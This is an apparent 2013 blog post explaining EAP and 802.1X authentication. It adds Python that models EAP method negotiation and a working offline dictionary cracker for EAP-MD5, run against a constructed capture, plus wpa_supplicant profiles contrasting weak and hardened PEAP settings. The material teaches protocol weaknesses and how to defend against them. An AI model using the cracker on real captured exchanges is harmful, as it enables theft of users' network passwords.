Wednesday, 17 April 2013

Extensible Authentication Protocol - EAP

To authenticate users at Layer 2, the Extensible Authentication Protocol (EAP) is used within the IEEE 802.1X port-based access control framework. EAP itself is only a carrier: the actual authentication is done by an EAP method (EAP-TLS, PEAP, and so on) negotiated inside it.

EAP operation consists of three distinct elements:

      Supplicant ------ Authenticator ------ Authentication Server

In WLANs the supplicant is software running on a station (STA); the authenticator is either an access point or a wireless LAN controller. The authentication server is usually a RADIUS server.

The authenticator maintains two virtual ports, an uncontrolled port and a controlled port. The uncontrolled port passes only EAP authentication traffic (EAPOL), while the controlled port blocks all other traffic until the supplicant has been authenticated and authorized.

EAP methods can use certificates on one or both sides: tunneled methods such as PEAP and EAP-TTLS use a server-side certificate to authenticate the server and to build the TLS tunnel that protects the inner credential exchange, while EAP-TLS uses both a server-side and a client-side certificate.

Between the supplicant and the authenticator, EAP messages are encapsulated in EAP over LAN (EAPOL) frames; the authenticator strips the EAPOL header and relays the EAP packet to the authentication server inside RADIUS.

The IEEE 802.1X/EAP authentication framework sits on top of IEEE 802.11 Open System authentication. A STA first joins the BSS (802.11 authentication and association at Layer 2) and only proceeds to Layer 3 (e.g. a DHCP request) if the entire IEEE 802.1X/EAP process succeeds; with WPA/WPA2, the 4-way handshake that derives the session keys follows EAP success and the controlled port is opened only after it completes.

Generic EAP process flow:

1. The authenticator sends an EAP-Request/Identity to the supplicant when it connects to the network.

2. The supplicant sends an EAP-Response/Identity to the authenticator, which embeds the EAP packet in a RADIUS Access-Request (EAP-Message attribute) and forwards it to the authentication server. This outer identity is sent in the clear, which is why tunneled methods let the supplicant send an anonymous outer identity and the real username inside the tunnel.

3. The authentication server negotiates the EAP method by sending an EAP-Request of the method type it wants to use. The supplicant either acknowledges that method by answering with an EAP-Response of the same type, or responds with a negative acknowledgement (NAK) listing the alternative EAP methods it is willing to use. The authentication server and the supplicant must agree on an EAP method before authentication can proceed; if they cannot, the server sends EAP-Failure.

4. Once the agreed method completes, the server returns EAP-Success or EAP-Failure (carried in a RADIUS Access-Accept or Access-Reject). On success the authenticator opens the controlled port for that supplicant.
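The following model of that exchange is an added example and is not code from the original post or from any EAP implementation. The packet layout is the real one from RFC 3748 (Code, Identifier, Length, Type, Type-Data) and the EAPOL header from IEEE 802.1X, but the supplicant and server logic is a toy: a method counts as completed as soon as the supplicant answers a Request of that type, and the RADIUS leg is represented by handing raw EAP packets to the server side. The identity and method lists are constructed for the example.

```python
"""Toy model of the EAP identity and method-negotiation flow (RFC 3748).
Added example, not code from the original post or from any EAP implementation."""
import struct

EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
TYPE_IDENTITY, TYPE_NAK, TYPE_MD5, TYPE_TLS, TYPE_PEAP = 1, 3, 4, 13, 25  # IANA numbers
EAPOL_VERSION, EAPOL_EAP_PACKET = 2, 0  # 802.1X-2004, packet type 0 = EAP-Packet


def build_eap(code, identifier, eap_type=None, data=b""):
    """Serialize an EAP packet; Success and Failure carry no Type field."""
    body = b"" if eap_type is None else bytes([eap_type]) + data
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_eap(pkt):
    """Return (code, identifier, type or None, type_data); reject bad lengths."""
    code, identifier, length = struct.unpack("!BBH", pkt[:4])
    if length < 4 or length != len(pkt):
        raise ValueError("bad EAP length")
    if code in (EAP_SUCCESS, EAP_FAILURE):
        return code, identifier, None, b""
    return code, identifier, pkt[4], pkt[5:]


def eapol_wrap(eap_pkt):
    """Supplicant <-> authenticator leg: the EAP packet rides in an EAPOL frame."""
    return struct.pack("!BBH", EAPOL_VERSION, EAPOL_EAP_PACKET, len(eap_pkt)) + eap_pkt


def eapol_unwrap(frame):
    _version, ptype, length = struct.unpack("!BBH", frame[:4])
    if ptype != EAPOL_EAP_PACKET:
        raise ValueError("not an EAPOL EAP-Packet frame")
    return frame[4:4 + length]


class Supplicant:
    def __init__(self, identity, allowed_methods):
        self.identity = identity
        self.allowed = list(allowed_methods)  # in order of preference

    def respond(self, request):
        code, ident, eap_type, _ = parse_eap(request)
        if code != EAP_REQUEST:
            raise ValueError("supplicant only answers Requests")
        if eap_type == TYPE_IDENTITY:
            # Outer identity: sent in the clear over the air
            return build_eap(EAP_RESPONSE, ident, TYPE_IDENTITY, self.identity.encode())
        if eap_type in self.allowed:
            return build_eap(EAP_RESPONSE, ident, eap_type)  # accept the proposed method
        # Legacy NAK (RFC 3748 s5.3.1): list the methods we would accept instead
        return build_eap(EAP_RESPONSE, ident, TYPE_NAK, bytes(self.allowed))


def run_exchange(supplicant, server_methods):
    """Drive steps 1-4 of the flow above. relay() plays the authenticator:
    EAPOL toward the STA, raw EAP toward the server (RADIUS in real life).
    Returns (final_code, outer_identity, agreed_method_or_None, transcript)."""
    transcript = []

    def relay(eap_request):
        transcript.append(("request", parse_eap(eap_request)[2]))
        frame = eapol_wrap(eap_request)                                    # authenticator -> STA
        reply_frame = eapol_wrap(supplicant.respond(eapol_unwrap(frame)))  # STA -> authenticator
        reply = parse_eap(eapol_unwrap(reply_frame))                       # EAPOL stripped, EAP to server
        transcript.append(("response", reply[2]))
        return reply

    ident = 0
    _, _, _, identity = relay(build_eap(EAP_REQUEST, ident, TYPE_IDENTITY))
    candidates = list(server_methods)        # server's preference order
    while candidates:
        ident += 1                           # fresh Identifier for every Request
        method = candidates[0]
        _, _, rtype, data = relay(build_eap(EAP_REQUEST, ident, method))
        if rtype == method:
            transcript.append(("success", None))
            return EAP_SUCCESS, identity.decode(), method, transcript
        if rtype != TYPE_NAK:
            break
        # Keep only the methods the supplicant asked for, in the server's order
        candidates = [m for m in candidates[1:] if m in set(data)]
    transcript.append(("failure", None))
    return EAP_FAILURE, identity.decode(), None, transcript


if __name__ == "__main__":
    sta = Supplicant("alice@example.com", [TYPE_TLS, TYPE_PEAP])
    # Server prefers MD5, then PEAP, then TLS; the supplicant NAKs MD5 and they settle on PEAP
    print(run_exchange(sta, [TYPE_MD5, TYPE_PEAP, TYPE_TLS]))
```

Run it to see the negotiation: the server first proposes MD5-Challenge, the supplicant NAKs with its own list, and the server picks the first of its remaining methods that the supplicant accepts. If no method is common, the result is EAP-Failure and the controlled port stays closed.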

Weak EAP Protocols:

   EAP-MD5:
   - One-way authentication only: the server is never authenticated, so a rogue AP is not detected
   - Username sent in clear text
   - MD5 challenge/response can be cracked offline with a dictionary attack from a single sniffed exchange
   - Derives no keying material, so it cannot provide dynamic per-session encryption keys

   EAP-LEAP:
   - Pseudo-mutual authentication (both sides answer a challenge, but no server certificate is involved)
   - Username sent in clear text
   - Modified MS-CHAP challenge/response derived from the NT password hash, crackable offline from a captured exchange (the same attack class as EAP-MD5)
   - Cisco proprietary
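To make the EAP-MD5 weakness concrete, here is an added example (not code from the original post) that computes the MD5-Challenge response exactly as RFC 3748 section 5.4 defines it, MD5(Identifier || secret || Challenge), and then runs the offline dictionary attack an eavesdropper can mount after capturing one Request and one Response. The "captured" exchange, the user name, the password and the word list are all constructed for the example; LEAP is attackable the same way, but its MS-CHAP response needs a DES implementation and is not shown.

```python
"""EAP-MD5 challenge/response and the offline dictionary attack it allows.
Added example; the captured exchange below is constructed, not real traffic."""
import hashlib


def md5_type_data(value, name=b""):
    """Type-Data of an MD5-Challenge packet: Value-Size | Value | Name.
    Request carries the challenge as Value; Response carries the 16-byte digest."""
    return bytes([len(value)]) + value + name


def parse_md5_type_data(data):
    """Split MD5-Challenge Type-Data back into (value, name)."""
    size = data[0]
    if size < 1 or 1 + size > len(data):
        raise ValueError("bad Value-Size")
    return data[1:1 + size], data[1 + size:]


def eap_md5_response(identifier, password, challenge):
    """RFC 3748 s5.4 (CHAP, RFC 1994): MD5(Identifier || secret || Challenge).
    The identifier is the EAP Identifier byte of the Request being answered.
    Nothing here yields a session key, so EAP-MD5 cannot key the link."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def crack_eap_md5(identifier, challenge, response, wordlist):
    """Attacker who sniffed the Request (challenge) and the Response (digest):
    the password is the only unknown, so each guess costs one MD5 call."""
    for word in wordlist:
        if eap_md5_response(identifier, word.encode(), challenge) == response:
            return word
    return None


# --- constructed "capture" of one EAP-MD5 exchange (not a real capture) ---
CAPTURED_IDENTIFIER = 0x2A
CAPTURED_CHALLENGE = bytes.fromhex("8f3a91c0d44e6b7a2c51e0f9bb1347de")
_USER_PASSWORD = b"Summer2013!"  # known only to supplicant and server, not to the attacker
CAPTURED_REQUEST_DATA = md5_type_data(CAPTURED_CHALLENGE, b"radius.example.com")
CAPTURED_RESPONSE_DATA = md5_type_data(
    eap_md5_response(CAPTURED_IDENTIFIER, _USER_PASSWORD, CAPTURED_CHALLENGE), b"alice")


def recover_password_from_capture(wordlist):
    """What the attacker does with the two sniffed Type-Data fields."""
    challenge, _server_name = parse_md5_type_data(CAPTURED_REQUEST_DATA)
    digest, _user = parse_md5_type_data(CAPTURED_RESPONSE_DATA)
    return crack_eap_md5(CAPTURED_IDENTIFIER, challenge, digest, wordlist)


if __name__ == "__main__":
    print(recover_password_from_capture(["password", "Welcome1", "Summer2013!"]))
```

The attack needs no interaction with the network after the capture, which is why the speed of MD5 matters: a real word list or GPU cracker tries the guesses at the rate of plain MD5 hashing. Because the username travels in the clear in the Identity exchange, the attacker also knows which account the recovered password belongs to.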

Strong EAP Protocols:

   EAP-PEAP (TLS tunnel built with a server certificate; the inner method runs inside it):
   - EAP-PEAPv0 (EAP-MS-CHAPv2)
   - EAP-PEAPv0 (EAP-TLS)
   - EAP-PEAPv1 (EAP-GTC)

   EAP-TTLS (TLS tunnel built with a server certificate; the inner method can be EAP or a legacy method such as PAP, CHAP or MS-CHAPv2)

   EAP-TLS (mutual certificate-based authentication; most secure, highly recommended for enterprise WLANs)

   EAP-FAST (Cisco-developed, published as RFC 4851; uses PACs - Protected Access Credentials - instead of a server certificate to build the tunnel)

   The tunneled methods are only as strong as the supplicant's validation of the server certificate: if the client does not check the certificate against a trusted CA and the expected server name, a rogue AP with its own RADIUS server can terminate the tunnel and collect the inner MS-CHAPv2 exchange, which is then subject to the same offline attack as LEAP. 
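As an added example (not from the original post), here is what that caveat looks like in a wpa_supplicant configuration: the first network block is the weak setting, the second is the corrected PEAP profile, and the third is the EAP-TLS profile. The SSID, server name, identities, and file paths are assumptions for the example.

```conf
# Weak: PEAP with no CA pinning. Any server presenting any certificate can
# terminate the TLS tunnel and receive the MS-CHAPv2 exchange inside it.
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice@example.com"
    password="REPLACE-ME"
    phase2="auth=MSCHAPV2"
}

# Corrected: pin the issuing CA, require the server's name to match, and hide
# the real username behind an anonymous outer identity.
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    anonymous_identity="anonymous@example.com"
    identity="alice@example.com"
    password="REPLACE-ME"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.example.com"
    phase2="auth=MSCHAPV2"
}

# EAP-TLS: both sides present a certificate; no password to harvest.
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="alice@example.com"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    client_cert="/etc/wpa_supplicant/alice.crt"
    private_key="/etc/wpa_supplicant/alice.key"
    private_key_passwd="REPLACE-ME"
    domain_suffix_match="radius.example.com"
}
```

The same two checks (trusted CA plus expected server name) are what the Windows and mobile supplicants expose as "validate server certificate" and "connect to these servers"; a profile that leaves either unset turns a strong tunneled method back into a LEAP-class credential leak against a rogue AP.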



References:

User Guide for the Cisco Secure Access Control System 5.2
CWSP Certified Wireless Security Professional Official Study Guide
